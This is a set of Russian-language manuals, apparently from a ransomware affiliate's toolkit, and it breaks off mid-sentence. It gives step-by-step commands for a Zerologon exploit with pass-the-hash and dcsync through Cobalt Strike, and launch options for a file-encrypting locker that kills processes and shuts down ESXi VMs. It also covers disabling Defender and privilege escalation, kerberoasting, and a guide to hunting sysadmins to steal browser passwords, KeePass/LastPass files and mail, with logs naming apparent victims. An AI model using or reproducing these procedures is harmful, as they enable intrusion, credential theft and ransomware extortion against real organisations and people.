https://t.me/cyb3rhunt3r 14 | https://t.me/cveNotify 15 | https://t.me/MalwareResearch 16 | https://t.me/BugCrowd 17 | https://t.me/itsecalert 18 | 19 | Список ТГ форумов, много интересного -------------------------------------------------------------------------------- /MANUALS/Установка метасплойт на впс.txt: -------------------------------------------------------------------------------- 1 | Установка метасплойт на впс 2 | 3 | 4 | 1 apt-get update 5 | apt-get install curl 6 | apt-get install tmux 7 | apt-get install default-jdk 8 | apt-get install postgresql 9 | apt-get install nano 10 | apt-get install gpg 11 | curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall 12 | 13 | chmod +x msfinstall 14 | ./msfinstall 15 | 2 16 | далее открываем 17 | 18 | nano /opt/metasploit-framework/bin/msfdb 19 | 20 | находим и коментироуем вот эти строчки 21 | # if grep -q kali /etc/os-release; then 22 | # echo "Metasploit running on Kali Linux as root, using system database 23 | 24 | сохраняем CTRL+O 25 | msfdb init -------------------------------------------------------------------------------- /MANUALS/Эксплуатация CVE-2020-1472 Zerologon в Cobalt Strike.txt: -------------------------------------------------------------------------------- 1 | Эксплуатация CVE-2020-1472 Zerologon в Cobalt Strike 2 | 3 | Выкачиваем скрипт тут 4 | https://github.com/rsmudge/ZeroLogon-BOF 5 | 6 | Подключаем как обычно, адрес скрипта 7 | ZeroLogon-BOF/dist/zerologon.cna 8 | 9 | В консоли должна появится новая команда - zerologon 10 | 11 | Применение: 12 | 13 | net domain - получаем имя домена (Например domain.local) 14 | 15 | Запускаем эксплоит: 16 | zerologon iunderstand domain.local 17 | 18 | iunderstand - стоп слово. Эксплуатируя эту уязвимость мы сбрасываем пароль. Этот эксплоит может привести к нарушению функционирования контроллера домена. ИСПОЛЬЗУЕМ В ПОСЛЕДНЮЮ ОЧЕРЕДЬ. 19 | 20 | В случае успеха мы получаем: 21 | Success! Use pth .\\%S 31d6cfe0d16ae931b73c59d7e0c089c0 and run dcscync 22 | 23 | Делаем все как написанно. выполняем 24 | pth .\\%S 31d6cfe0d16ae931b73c59d7e0c089c0 25 | 26 | И выполняем 27 | dcsync domain.local 28 | 29 | Если все успешно отработало, мы получаем NTDS -------------------------------------------------------------------------------- /MANUALS/параметр запуска локера на линукс версиях.txt: -------------------------------------------------------------------------------- 1 | @all параметр запуска локера на линукс версиях 2 | Параметры запуска unix версии 3 | --path 4 | При использовании этого параметра локер зашифрует файлы по указанному пути. Обязательный параметр без него лочить ни чего не будет. 5 | ./encryptor --path /path 6 | 7 | --prockiller 8 | Убивает все процессы которые мешают открытию файлов. 9 | ./encryptor --path /path --prockiller 10 | 11 | --log 12 | Включает логирование всех действий и ошибок 13 | ./encryptor --path /path --log /root/log.txt 14 | 15 | --vmkiller(Только для esxi) 16 | Выключает все виртуальные машины 17 | 18 | --vmlist(Только для esxi) 19 | Задает файл со списком виртуальных машин, которые не надо выключать. По одной строке на каждую вм 20 | ./encryptor --path /path --vmkiller --vmlist /tmp/list.txt 21 | 22 | --detach 23 | Отвязывает процесс от терминала. 24 | Чтобы если ssh сессия отвалилась локер дальше работал 25 | И файлы не побил 26 | 27 | ESXi версию ЗАПРАШИВАЙТЕ ОТДЕЛЬНО 28 | 29 | 30 | Если где то не запускается мне надо ос, версию ядра и версию glibc 31 | /lib64/libc.so.6 -------------------------------------------------------------------------------- /MANUALS/по отключению дефендера.txt: -------------------------------------------------------------------------------- 1 | *по отключению дефендера - открываешь гмер или альтернативы - отрубаешь процесс mspeng \ им же заходишь в расположение файла, удаляешь сам файл = браво, вы великолепны -------------------------------------------------------------------------------- /MANUALS/поднятие прав (дефолт).txt: -------------------------------------------------------------------------------- 1 | поднятие прав (дефолт) 2 | если видим что бот пришол с синим моником, первое что проверяем это права нашего пользака на тачке ( shell whoami /groups ) 3 | если видим в самом верху что у нас админ права ( BULTIN\Administrators ) то смело жмякаем пкм по боту - ацесс - елевейт 4 | далее: 5 | svc-exe ( запустить новую сессию на боте не из процесса а из сервисов, сессия придёт от системы с красным моником ) 6 | uac-token-dubl ( запустить сессию от текущего пользователя, но уже с красным моником ) 7 | -------------------------------------------------------------------------------- /MANUALS/хантинг админов, прошу ознакомиться, очень полезно!!.txt: -------------------------------------------------------------------------------- 1 | ```Хантим админа. 2 | 3 | И так, если у нас есть сервера\НАСы\тейпы или облачные хранилища куда складываются бекапы,а доступа нет то нам нужны креды которые есть только у админа. 4 | Соответсвенно его нам надо схантить. Обычно в тех сетях которых мы работаем админов 1-2-3, не более. 5 | Люди делятся должностями на 3 типа: 6 | 7 | Senior(Старший) 8 | Medium(Средний) 9 | Junior(Младший) 10 | 11 | Конечно, нам интересны сеньоры так как у них привилегий\доступов(читай паролей) больше. 12 | 13 | 14 | Для начала напишу несколько вариантов как определить учетные записи тех самых администраторов, которые имеют на борту пароли. 15 | 16 | Часть1:: 17 | Вариант №1: 18 | Опрашиваем ДА 19 | 20 | ``` 21 | 22 | beacon> shell net group "domain admins" /domain 23 | 24 | Tasked beacon to run: net group "domain admins" /domain 25 | host called home, sent: 64 bytes 26 | received output: 27 | 28 | 29 | La demande sera traitée sur contrôleur de domaine du domaine DOMAIN.com. 30 | 31 | Nom de groupe Domain Admins 32 | Commentaire Designated administrators of the domain 33 | 34 | Membres 35 | 36 | ------------------------------------------------------------------------------- 37 | Administrator ClusterSvc createch 38 | Createch2 d01adm da9adm 39 | p01adm PMPUser q01adm 40 | repl s01adm Sapserviced01 41 | SAPServiceDA9 sapservicep01 SAPServiceQ01 42 | sapservices01 SAPServiceSND SAPServiceSOL 43 | services services2 sndadm 44 | soladm somadm staseb 45 | telnet Johnadm 46 | La commande s'est terminée correctement. 47 | 48 | ``` 49 | 50 | Смотрим и глазами фильтруем сервисные учетки и не сервисные. 51 | Сервисные из списка выше это например 52 | ``` 53 | SAPServiceDA9 54 | services 55 | telnet 56 | servies2 57 | Sapservice01 58 | ... 59 | 60 | ``` 61 | 62 | Какие учетки нам СКОРЕЕ ВСЕГО подойдут: 63 | ```staseb 64 | Johnadm 65 | ``` 66 | 67 | Их записали. 68 | 69 | Можем посмотреть кем они являются в adfind_persons.txt 70 | 71 | или через команду 72 | ```shell net user staseb /domain 73 | ``` 74 | 75 | См пример: 76 | ``` 77 | 78 | beacon> shell net user ebernardo /domain 79 | 80 | Tasked beacon to run: net user ebernardo /domain 81 | host called home, sent: 57 bytes 82 | received output: 83 | 84 | 85 | User name ebernardo 86 | Full Name Eric Bernardo 87 | Comment 88 | User's comment 89 | Country/region code (null) 90 | Account active Yes 91 | Account expires Never 92 | 93 | Password last set 2020-12-08 12:05:15 PM 94 | Password expires 2021-06-06 12:05:15 PM 95 | Password changeable 2020-12-08 12:05:15 PM 96 | Password required Yes 97 | User may change password Yes 98 | 99 | Workstations allowed All 100 | Logon script 101 | User profile 102 | Home directory 103 | Last logon 2021-01-29 2:25:24 PM 104 | 105 | Logon hours allowed All 106 | 107 | Local Group Memberships *Administrators *Remote Desktop Users 108 | *Server Operators 109 | Global Group memberships *US Users *Great Plains Users 110 | *Citrix Group *VPN Users Saskatoon 111 | *Admins - AD Basic *VPNUsersHeadOffice 112 | *Executives *All Winnipeg Staff 113 | *Scribe Console Users *Domain Admins 114 | *VPN Users USA *Workstation.admins 115 | *Domain Users 116 | The command completed successfully. 117 | 118 | ``` 119 | 120 | Смотрим кто такой - входит в десяток групп, ИНОГДА в колонке Comment пишут кем является - инженер\сис админ\саппорт\бизнес консультант. 121 | в Last Logon учетка должна быть АКТИВНАЯ - то есть ласт логон сегодня\вчера\на этой неделе, но никак не год назад или Never. 122 | Если не стало понятно кто это такой после опроса смотри adfind + проверяй linkedin(рздел ниже). 123 | 124 | Так 2-3-5 учеток в итоге выцепляешь из домен админов и опрашиваешь каждого и должен иметь представление кто это такой. По итогу 1-2-3 учетки получается найти кто может быть админом. 125 | 126 | 127 | Вариант №2: 128 | Превращаемся в домашних аналитиков - смотрим Adfind. 129 | Нам интересен файл adfind_groups 130 | Заходим, видим кучу текста 131 | Жмём Ctrl + F(Notepad2 / Geany) 132 | Вводим 133 | ```dn:CN= 134 | ``` 135 | И кнопочку Find All in current document. 136 | 137 | на выходе получаем ПРИМЕРНО следующее(я вырезал кусок и оставил 10-20 строк, обычно тут от 100 до 10000 строк) 138 | ``` 139 | 140 | adfind_groups:3752: dn:CN=SQLServer2005SQLBrowserUser$TRUCAMTLDC,CN=Users,DC=domain,DC=com 141 | adfind_groups:3775: dn:CN=clubsocial,CN=Users,DC=domain,DC=com 142 | adfind_groups:3800: dn:CN=Signature Intl-Special,OU=Groupes,OU=Infra,DC=domain,DC=com 143 | adfind_groups:3829: dn:CN=FIMSyncAdmins,CN=Users,DC=domain,DC=com 144 | adfind_groups:3852: dn:CN=GRP-GRAPHISTE,OU=FG-GRP,DC=domain,DC=com 145 | adfind_groups:3877: dn:CN=IT,CN=Users,DC=domain,DC=com 146 | adfind_groups:3902: dn:CN=MSOL_AD_Sync_RichCoexistence,CN=Users,DC=domain,DC=com 147 | adfind_groups:3925: dn:CN=WinRMRemoteWMIUsers__,CN=Users,DC=domain,DC=com 148 | adfind_groups:3946: dn:CN=EDI,CN=Users,DC=domain,DC=com 149 | adfind_groups:3967: dn:CN=Signature Canada,OU=Groupes,OU=Infra,DC=domain,DC=com 150 | adfind_groups:4037: dn:CN=Signature USA,OU=Groupes,OU=Infra,DC=domain,DC=com 151 | 152 | ``` 153 | 154 | И так, мы извлекли группы active directory. 155 | Что нам здесь интересно и для чего мы это сделали - в active directroy всё структурируется и в USA EU сетях всё делает максиимально понятно прозрачно с комментариями, пометками, прописями итд 156 | Нам интересная группа которая занимается IT, администрированием, инженерией ЛВС. 157 | То что после поиска нам выдало - выносим в новый блокнот и делаем поиск по следующи ключ словам: 158 | ``` 159 | IT 160 | Admin 161 | engineer 162 | ----- 163 | ``` 164 | 165 | В примере выше мы находим следующую строку 166 | ``` 167 | adfind_groups:3877: dn:CN=IT,CN=Users,DC=domain,DC=com 168 | ``` 169 | 170 | Переходим по строке 3877 в adfind_Groups.txt и видим следующее: 171 | ``` 172 | 173 | dn:CN=IT,CN=Users,DC=domain,DC=com 174 | >objectClass: top 175 | >objectClass: group 176 | >cn: IT 177 | >description: Informatique 178 | >member: CN=MS Surface,OU=IT,DC=domain,DC=com 179 | >member: CN=Gyslain Petit,OU=IT,DC=domain,DC=com 180 | >member: CN=ftp,CN=Users,DC=domain,DC=com 181 | >member: CN=St-Amand\, Sebastien\, CDT,OU=IT,DC=domain,DC=com 182 | ``` 183 | 184 | Пользователи ftp и MS Surface пропускаем, а вот Gyslain Petit и St Amand Sebastien берем в оборот. 185 | Далее открываем ad_users.txt 186 | Вводим Gyslain Petit 187 | Находим пользователя со следующей информацией: 188 | ``` 189 | 190 | dn:CN=Gyslain Petit,OU=IT,DC=trudeaucorp,DC=com 191 | >objectClass: top 192 | >objectClass: person 193 | >objectClass: organizationalPerson 194 | >objectClass: user 195 | >cn: Gyslain Petit 196 | >sn: Petit 197 | >title: Directeur, technologie de l'information 198 | >physicalDeliveryOfficeName: 217 199 | >givenName: Gyslain 200 | >distinguishedName: CN=Gyslain Petit,OU=IT,DC=trudeaucorp,DC=com 201 | >instanceType: 4 202 | >whenCreated: 20020323153742.0Z 203 | >whenChanged: 20201212071143.0Z 204 | >displayName: Gyslain Petit 205 | >uSNCreated: 29943 206 | >memberOf: CN=GRP_Public_USA_P,OU=Securite-GRP,DC=trudeaucorp,DC=com 207 | >memberOf: CN=GRP-LDAP-VPN,OU=FG-GRP,DC=trudeaucorp,DC=com 208 | >memberOf: CN=IT Support,CN=Users,DC=trudeaucorp,DC=com 209 | >memberOf: CN=Directeurs,CN=Users,DC=trudeaucorp,DC=com 210 | >memberOf: CN=GRP-IT,OU=FG-GRP,DC=trudeaucorp,DC=com 211 | >memberOf: CN=Signature Canada,OU=Groupes,OU=Infra,DC=trudeaucorp,DC=com 212 | >memberOf: CN=EDI,CN=Users,DC=trudeaucorp,DC=com 213 | >memberOf: CN=IT,CN=Users,DC=trudeaucorp,DC=com 214 | >memberOf: CN=TRUDEAU-MONTREAL,CN=Users,DC=trudeaucorp,DC=com 215 | >memberOf: CN=everyone,CN=Users,DC=trudeaucorp,DC=com 216 | >uSNChanged: 6908986 217 | >department: IT Manager 218 | ``` 219 | Смотрим title и кто это у нас тут? Директор информационных технологий. В яблочко, казалось бы, но директор не всегда имеет у себя пароли, а вот System Administrator какой нибудь - вполне. 220 | Поэтому по второму пользователю и более проводим аналогичные манипуляции. У себя(=в конфе) делаем заметки кто есть кто и записываем логины из адфайнда(sAMAccountname) примерно так: 221 | ```>sAMAccountName: gpetit 222 | ``` 223 | 224 | ``` 225 | gpetit - Директор айти 226 | staseb - такой то такой 227 | ``` 228 | 229 | 230 | Вторая часть варианта №2(Упрощенная): 231 | Смотрим изначально в adfind_users.txt 232 | Делаем поиск по 233 | ```title: 234 | description 235 | departament 236 | ``` 237 | Если повезет, то там будет прям написаны должности. В моем тестовом кейсе это выглядит вот так: 238 | 239 | ``` 240 | adfind_persons:280: >title: Responsable, logistique direct import 241 | adfind_persons:1836: >title: Chef des services techniques 242 | adfind_persons:1955: >title: Chef comptable 243 | adfind_persons:4544: >title: Directeur, technologie de l'information 244 | adfind_persons:6064: >title: Présidente 245 | adfind_persons:6191: >title: Chargée de projets, mise en marché 246 | adfind_persons:6285: >title: Directrice marketing 247 | adfind_persons:6848: >title: Coordonnatrice à la logistique 248 | adfind_persons:6948: >title: Responsable de l'expedition 249 | ``` 250 | 251 | Соответсвенно глазами пробегаем и учетки найдены. 252 | 253 | 254 | И так, это easy методы. Рассмотрим альтернативные поиски учеток админа. 255 | Я знаю пока только 1 метод из простых - linkedin 256 | Вбиваем в гугл запрос 257 | ``` 258 | НАШАЖЕРТВА.КОМ linkedin 259 | ``` 260 | вместо домен - вставить домен конторы. 261 | 262 | Переходим в Members 263 | Делаем поиск там по 264 | ``` 265 | System 266 | Admin 267 | Engineer 268 | Network 269 | It 270 | ``` 271 | Если у кого то выпало имя + фамилия, то вбиваем его в адфайнд и учетка найдены. 272 | Если знаете о методах эффективнее - пожалуйста, напишите @rozetka 273 | 274 | И так, часть №1 закончена. 275 | 276 | Приступаем к ханту админа и осмотру 277 | 278 | Часть №2: 279 | Хантим админа стандартно через SharpView 280 | SharpView.exe можете взять в конференции у своих тимлидов либо с конфы софта 281 | Команда для ханта такая: 282 | On Linux 283 | ``` 284 | execute-assembly /home/user/soft/scripts/SharpView.exe Find-DomainUserLocation -UserIdentity gpetit 285 | ``` 286 | On Windows > 287 | ``` 288 | execute-assembly C:\Users\Андрей\Soft\Hacking\SharpView.exe Find-DomainUserLocation -UserIdentity gpetit 289 | ``` 290 | 291 | где gpetit - учетная запись того кого ищем. то, что записано в adfinusers в sAMAccountname - вставляем именно сюда. 292 | 293 | На выходе получаем примерно следующий лог: 294 | 295 | ``` 296 | 297 | UserDomain : domain 298 | UserName : gpetit 299 | ComputerName : DC01.domain.LOCAL 300 | IPAddress : 172.16.1.3 301 | SessionFrom : 192.168.100.55 302 | SessionFromName : 303 | LocalAdmin : 304 | 305 | UserDomain : domain 306 | UserName : gpetit 307 | ComputerName : SQL01.domain.LOCAL 308 | IPAddress : 172.16.1.30 309 | SessionFrom : 192.168.100.55 310 | SessionFromName : 311 | LocalAdmin : 312 | 313 | UserDomain : domain 314 | UserName : gpetit 315 | ComputerName : lptp-gpetit.domain.LOCAL 316 | IPAddress : 172.16.1.40 317 | SessionFrom : 192.168.100.55 318 | SessionFromName : 319 | LocalAdmin : 320 | 321 | ``` 322 | 323 | 324 | И так, лог будет примерного такого формата, как нам с этим быть - 325 | Во первых, как работает софт - он опрашивает где в даннай момент хоть как то авторизован пользователь. А пользователь у нас не простой - он администратор и в какой то момент он может быть авторизован на 20-30-50 серверах. 326 | Как нам фильтрануть и не увязнуть в этом? 327 | Во первых, убираем неинтересные нам ОС 328 | например первый в списке DC01 - явно ДоменКонтроллер01, можно его проверить по adfind_computers.txt либо portscan 172.16.1.13 и увидеть, что это СЕРВЕРНАЯ ОС. А нам нужна клиентская. 329 | Вторая - SQL01 - БДшная ОС. Нам не подходит. 330 | Смотрим третью - lptp-gpetit. Хм, нашего пользователя зовут gpetit, а lptp - означает laptop, то есть ноутбук. Возможно это как раз он. 331 | #Также бывает, что админ подключен ТОЛЬКО на серверные ОС, но в колонке SessionFrom - айпи из другого сабнета(например впн сабнет) где он тихо сидит но SharpView его не "взяло" - тоже можно взять в оборот. 332 | Далее - ВАЖНЫЙ ПУНКТ. 333 | Новички первым делом пытаются поднять там сессию и ОЧЕНЬ ЧАСТО ловят алерт. Алерт у админа = выпиливание из сети, потеря времени, нервов. Так делать НЕЛЬЗЯ! 334 | Что мы будем делать - опрашивать его через файловую систему. 335 | Делаем следующее 336 | ```shell net view \\172.16.1.40 /ALL 337 | ``` 338 | 339 | На выходе видим его локальные дики 340 | ``` 341 | C$ 342 | D$ 343 | ``` 344 | Обуваем токен(Рекомендуется именно токен, ибо pth оставляет несколько иной Event ID на домен контроллере, а это может заметить админ и выпилить нас) 345 | 346 | Открываем File Manager в кобальте: 347 | ```\\172.16.1.40\c$ 348 | ``` 349 | 350 | либо используем shell через 351 | ``` 352 | shell dir \\172.16.1.40\c$``` 353 | 354 | Смотрим что на диске C бегло 355 | Переходим в папку 356 | ```\\172.16.1.40\c$\Users\gpetit 357 | ``` 358 | 359 | Обычно если это ДЕЙСТВИТЕЛЬНО воркстанция админа - у него много хлама аля Virtualbox / putty / winscp итд итп 360 | 361 | Как нам его "осмотреть", вот список интересных директорий: 362 | 363 | Рабочий стол 364 | ```\\172.16.1.40\c$\Users\gpetit\Desktop 365 | ``` 366 | ``` 367 | \\172.16.1.40\c$\Users\gpetit\OneDrive 368 | \\172.16.1.40\c$\Users\gpetit\Downloads 369 | \\172.16.1.40\c$\Users\gpetit\Desktop 370 | \\172.16.1.40\c$\Users\gpetit\Documents 371 | 372 | ``` 373 | Здесь лежат папки с конфигурациями пользовательскими, ниже список того что можно будет извлечь: 374 | ```\\172.16.1.40\c$\Users\gpetit\AppData\Local 375 | ``` 376 | 377 | ```\\172.16.1.40\c$\Users\gpetit\AppData\Roaming 378 | ``` 379 | 380 | ``` 381 | \\172.16.1.40\c$\Users\gpetit\AppData\Local\Google\Chrome\User Data\Default 382 | ``` 383 | Здесь лежат History && Login Data от хрома. 384 | Хистори можно прямо скачать и осмотреть с помощью DBrowser for SQLite(nix win). Чем полезно - посмотреть куда админ ходит, за кого голосует, можно сортануть хистори по заголовку и найти прям NAS / Tape / vSphere итд. ОЧЕНЬ полезная вещь. 385 | Login Data - лежат логины и пароли. Зашифрованные(!). Если весит 38-42kb то там ПУСТО. Если весит больше 40-45кб( от 100кб до 1-2мегабайт) - значит там ТОЧНО есть пароли. Если есть нужный URL с сохр паролем - обратись к своему тимлиду. 386 | Также бывает в хроме, что в Логин Дате нет паролей, но если внимательно рассмотреть папку профиля, то найдется папка extenstions а там lastpass. Такое тоже в практике может случатся - в таком случае заходить по RDP ночью и экспортировать пароли(либо кейлогер или др варианты) 387 | 388 | Аналогично можно посмотреть папку Firefox / Edge (пути дополню, гуглятся легко) 389 | 390 | также у сис админов ЧАСТО встречаться в AppData\Roaming && AppData\Local следующие папки: 391 | ```Keepass 392 | LastPass 393 | ``` 394 | там их конфиги. Тащим их, выкладываем в конфу. если такое нашли - значит СКОРЕЕ ВСЕГО там масса именно ТЕХ САМЫХ нужных паролей. 395 | 396 | Также случается, что админ прямо на десктопе хранит аля 397 | ```access.xlsx 398 | passwords.docx 399 | ``` 400 | Качаем, ломаем, смотрим. 401 | 402 | также есть папка outlook 403 | ```\\172.16.1.40\c$\Users\gpetit\AppData\Local\Microsoft\Outlook 404 | ``` 405 | Здесь лежит файл аля 406 | ```gpetit@domain.com - Exchange1.ost 407 | ``` 408 | В нём ПЕРЕПИСКА данного перца. Её можно скачать к себе , открыть free ost viewer и посмотреть почту вход\исход. РЕГУЛЯРНО бывает полезно разобраться в сложных ситуациях именно этим приёмом. 409 | Копируется просто - вырубаем outlook.exe, делаем копипаст .ost файла, потом пользователь сам себе откроет outlook. 410 | 411 | ``` 412 | \\172.16.1.40\c$\Users\gpetit\AppData\Local\Filezilla 413 | \\172.16.1.40\c$\Users\gpetit\AppData\Roaming\Filezilla 414 | ``` 415 | Здесь файлы sitemanager.xml могут быть с кредами от FTP SSH. Качаем, смотрим, кидаем в конфу. 416 | 417 | 418 | Также осматриваем \\172.16.1.40\C$\ProgramData 419 | +Program files / x86 420 | + Локальные диски которые выпали в net view \\host /ALL 421 | D$ итд 422 | 423 | Также в ad_users.txt бывает homeDir - её тоже смотрим, изучаем. 424 | 425 | 426 | Вроде всё. 427 | 428 | Для чего мануал был написан - чтоб не пытались сломя голову идти поднимать сессию и ловить алерты от админа. 429 | Наша работа скорее заключается в том, чтобы разобраться что как устроено, а не настраивать брутфорс во всевозможные доступы. 430 | Всё уже хакнуто, надо просто посмотреть на всё !глазами админа! 431 | Главная задача при ханте админа - понять, где он хранит пароли и стащить БД\ексельку\файл\текствоик\документ -------------------------------------------------------------------------------- /MANUALS/это установка армитажа. ставится поверх Metasploit: -------------------------------------------------------------------------------- 1 | cd /opt/ 2 | curl -# -o /tmp/armitage.tgz http://www.fastandeasyhacking.com/download/armitage150813.tgz 3 | sudo tar -xvzf /tmp/armitage.tgz -C /opt 4 | sudo ln -s /opt/armitage/armitage /usr/local/bin/armitage 5 | sudo ln -s /opt/armitage/teamserver /usr/local/bin/teamserver 6 | sudo sh -c "echo java -jar /opt/armitage/armitage.jar \$\* > /opt/armitage/armitage" 7 | sudo perl -pi -e 's/armitage.jar/\/opt\/armitage\/armitage.jar/g' /opt/armitage/teamserver -------------------------------------------------------------------------------- /Manual_CS.txt: -------------------------------------------------------------------------------- 1 | MANUAL COBALT STRIKE 2 | !---------------------------------------------------Стандартные команды---------------------------------------------------! 3 | Создание нагрузки 4 | Attacks->Packages-> 5 | 6 | interact - выбрать агента 7 | help -> покажет список команд 8 | help [command] покажет помощь по определённой команде 9 | 10 | 11 | !-----------------------------------------------------Сбор информации AD--------------------------------------------------! 12 | 13 | !---Получение Домен Контроллера---! 14 | net domain_controllers 15 | net dclist 16 | shell nltest /dclist 17 | 18 | !---Получение списка компьютеров---! 19 | shell net group "Domain Computers" /domain 20 | net computers 21 | net view 22 | Get-ADComputer -Filter {enabled -eq $true} -properties *|select Name, DNSHostName, OperatingSystem !--Test--! 23 | 24 | !---Получение списка поддоменов---! 25 | net domain_trusts 26 | shell nltest /DOMAIN_TRUSTS 27 | 28 | !---Получение списка групп и пользователей---! 29 | shell net group "domain Admins" /domain - список Domain админов ; для немцев - shell net group "Domänen-Admins" /domain 30 | shell net group "Enterprise Admins" /domain - Enterprise админов 31 | shell net group "domain users" /domain - список Domain пользователей 32 | net group 33 | net localgroup 34 | net user 35 | 36 | !---Дополнительно---! 37 | net domain|systeminfo | findstr /B "Domain" - Покажет в каком домене находится ПК 38 | net sessions - Покажет активные сессии на ПК 39 | net time - Покажет время на ПК 40 | net logons - Покажет списки пользователей, вошедших на ПК 41 | 42 | !---Получение ShareFinder---! 43 | net share - Покажет список шар на ПК 44 | 45 | Собираем доступные Shares и смотрим результат, есть ли доступные для нашего текущего пользователя какие-либо $ADMIN share в домене. 46 | - powershell-import /opt/PowerSploit-dev/Recon/PowerView.ps1 47 | - powershell Invoke-ShareFinder -CheckShareAccess -Verbose 48 | Аналог: 49 | - powershell-import /opt/PowerSploit-dev/Recon/ShareFinder.ps1 50 | 51 | - psinject 4728 x86 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\found_shares.txt 52 | (в данный момент пошел скан и его результат записывается в файл, полностью файл обретет размер когда скан закончится и его можно будет скачать) 53 | 54 | Так же не забывайте смотреть процессы при помощи команды ps, там можно найти пользователя, мигрировать в его процесс > Explore > Process list > далее выбираем процесс другого пользователя. 55 | После миграции в нового пользователя вам так же нужно снять шары, чтобы посмотреть куда с ним можно проломиться 56 | Когда вы снимаете шары, то по окончанию снятия в директорию C:\ProgramData и там лежит sh.txt или shares.txt ,скачиваем, смотрим сколько есть "remote admin" в текстовике, если их больше одного, то это означает что доступ есть на другой комп 57 | 58 | !---Дополнительный инструмент---! 59 | 60 | !-Сбор информации о составе Active Directory при помощи AdFind.exe-! 61 | - загружаем adfind.exe и adf.bat в папку доступную для записи 62 | - переходим Cobalt Strike beacon в эту папку 63 | - запускаем shell adf.bat 64 | - ждем окончания работы скрипта 65 | - выкачиваем результат и удаляем то что загрузили на машину 66 | 67 | Содержимое adf.bat: 68 | 69 | adfind.exe -f "(objectcategory=person)" > ad_users.txt 70 | adfind.exe -f "objectcategory=computer" > ad_computers.txt 71 | adfind.exe -f "(objectcategory=organizationalUnit)" > ad_ous.txt 72 | adfind.exe -sc trustdmp > trustdmp.txt 73 | adfind.exe -subnets -f (objectCategory=subnet)> subnets.txt 74 | adfind.exe -f "(objectcategory=group)" > ad_group.txt 75 | adfind.exe -gcb -sc trustdmp > trustdmp.txt 76 | 77 | !-Собираем информацию по текущей машине при помощи SeatBelt-! 78 | - execute-assembly /opt/cobalt_strike_extension_kit/exe/Seatbelt.exe -group=all -outputfile="C:\ProgramData\textinfo.txt" 79 | (пояснений тут не даю, количество проверок там приличное и вся информация собранная в той или иной степени важная как в локальной машине так и в сети) 80 | 81 | 82 | !---------------------------------------------Методы повышения привилегий-----------------------------------------------! 83 | 84 | !---Использование exploits---! 85 | shell systeminfo - Получение информации о системе. 86 | Полученную информацию надо записать в текстовый файл (win10-systeminfo.txt) 87 | Использовать Windows-Exploit-Suggester, покажет какие примерно exploits нужно использовать. 88 | !---Обновление базы exploits---! 89 | /windows-exploit-suggester.py --update 90 | [*] initiating... 91 | [*] successfully requested base url 92 | [*] scraped ms download url 93 | [+] writing to file 2021-03-09-mssb.xls 94 | [*] done 95 | !---Запуск программы на обнаружение exploits---! 96 | ./windows-exploit-suggester.py --database 2021-03-09-mssb.xls --systeminfo win10-systeminfo.txt 97 | 98 | Далее согласно списку exploits который выдал Windows-Exploit-Suggester, применяем на машине. (Но прежде лучше прочитать про exploit, который хотите использовать, может быть так что он не подойдёт под вашу цель, особое внимание обратите на версию ОС и её разрядность.) 99 | Например: 100 | Вариант№1: 101 | elevate ms16-135 [listener] - команда использует exploit ms16-135 и при удачном срабатывании призовет новую сессию из под SYSTEM. 102 | 103 | Вариант№2: 104 | Например перейдем в эту директорию С:\Users\User1\Pictures (можете перейти в любую другую директорию, главное чтобы могли загрузить нагрузку) 105 | Загружаем вашу нагрузку upload artifact.exe|dll|One-liner 106 | runasadmin ms16-032 (Укажите директорию)artifact.exe [Параметр если нужен] команда использует exploit ms16-032 для запуска вашей нагрузки из под SYSTEM. В данном случае вам придёт новый агент из под SYSTEM. 107 | 108 | !---SharpUp---! 109 | SharpUp - это сканер неправильных конфигураций для повышения привилегий. 110 | Делаем скнирование: 111 | - execute-assembly /opt/cobalt_strike_extension_kit/exe/SharpUp.exe 112 | Пример вывода(Может и нечего не найти): 113 | 114 | === SharpUp: Running Privilege Escalation Checks === 115 | 116 | === Modifiable Services === 117 | Name :VMtools 118 | DisplayName :VMware Tool 119 | Discription :Provides support for synchronizing objects between the host and qwest operation system. 120 | State :Stopped 121 | StartMode :Auto 122 | PathName :C:\Program Files\VMware\VMware Tools\vmtoolsd 123 | === Modifiable Service Binaries === 124 | 125 | === AlwaysInstallElevated Registry Keys === 126 | 127 | === Modifiable Folders in %PATH% === 128 | 129 | === Modifiable Registry Autoruns === 130 | 131 | === *Special* User Privileges === 132 | 133 | === Unattended Install Files === 134 | 135 | === McAfee Sitelist.xml Files === 136 | 137 | === Cached GPP Password === 138 | 139 | Видим что наш пользователь может модифицировать VMtools сервис для того чтобы запустить нагрузку. 140 | Переходим Attacks --> WindowsExecutable (S) --> выбираем наш [Listener] и выводе Windows Service EXE --> Generate -->FileName:vmtoolsd.exe --> Save 141 | Далее передем в любую директорию, например: C:\Users\User1\Pictures и загрузим нашу нагрузку. 142 | Теперь модифицируем сервис: 143 | run sc config vmtoolsd binpath=C:\Users\User1\Pictures\vmtoolsd.exe 144 | run start vmtoolsd.exe 145 | После этого должен придти агент из под SYSTEM. 146 | 147 | 148 | 149 | !------------------------------------------Получение хешей и паролей------------------------------------------------! 150 | 151 | (МОЖНО ВЫПОЛНИТЬ БЕЗ ПРИВИЛЕГИЙ) 152 | !----kerberoast атака - получаем хэши из под памяти---! 153 | 154 | Проводим kerberoast атаку: 155 | - execute-assembly /opt/cobalt_strike_extension_kit/exe/Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt 156 | - execute-assembly /opt/cobalt_strike_extension_kit/exe/Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt 157 | - выкачиваем получившиеся файлы (если они выдали результат) 158 | - если не выдали то используем альтернативный powershell скрипт для проведения атаки: 159 | - powershell-import /opt/PowerSploit-dev\Recon\PowerView.ps1 160 | Аналог: 161 | - powershell-import /opt/PowerSploit-dev\Recon\Invoke-Kerberoast.ps1 162 | - psinject 4728 x86 Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\pshashes.txt -append -force -encoding UTF8 163 | 4728 в данном случае это текущий пид, а х86 его разрядность 164 | (полученные хеши отправятся в брут для получения клиртекст паролей либо будут использованы в контексте SYSTEM прав) 165 | 166 | Собираем информацию с браузера Chrome 167 | - execute-assembly /opt/cobalt_strike_extension_kit/exe/SharpChrome.exe logins /showall 168 | (тут мы получаем набор паролей текущего пользователя и некоторое представление о сетевых и внешних ресурсах куда он ходит) 169 | 170 | Проверяем наличие 